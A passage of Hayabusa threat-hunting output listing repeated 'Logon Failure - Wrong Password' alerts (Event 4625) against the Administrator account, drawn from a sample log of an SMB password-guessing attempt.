b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.489 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.542 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.792 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.912 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:59.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.079 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.304 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.353 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.634 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.761 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.821 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.915 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.944 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:00.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.101 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.615 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.647 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.900 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:01.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.072 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.173 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.205 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:02.506 +00:00,DESKTOP-M5SN04R,4625,low,,Logon 